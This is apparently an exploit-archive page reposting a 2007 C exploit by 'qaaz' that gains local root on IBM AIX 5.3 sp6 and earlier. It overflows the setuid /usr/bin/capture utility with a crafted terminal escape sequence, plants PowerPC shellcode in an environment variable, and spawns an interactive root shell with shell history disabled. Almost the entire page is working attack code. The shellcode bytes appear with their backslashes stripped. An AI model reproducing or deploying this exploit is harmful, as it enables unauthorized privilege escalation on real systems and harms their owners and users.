[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit
# Published : 2007-07-27
# Author : qaaz
# Previous Title : Live for Speed S1/S2/Demo (.mpr replay file) Buffer Overflow Exploit
# Next Title : IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"x60x60x60x60x60x60x60x60"
"x7cx63x1ax79x40x82xffxfd"
"x7exa8x02xa6x3axb5x01x01"
"x88x55xffx5bx3axd5xffx1b"
"x7exc8x03xa6x4cxc6x33x42"
"x44xffxffx02x38x75xffx5f"
"x38x63x01x01x88x95xffx5d"
"x38x63x01x02x38x63xfexff"
"x88xa3xfexffx7cx04x28x40"
"x40x82xffxf0x7cxa5x2ax78"
"x98xa3xfexffx88x55xffx5c"
"x38x75xffx5fx38x81xffxf8"
"x90x61xffxf8x90xa1xffxfc"
"x4bxffxffxbdxb8x05x7cxff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0An");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------n");
printf(" AIX capture Local Root Exploitn");
printf(" By qaazn");
printf("--------------------------------n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// www.Syue.com [2007-07-27]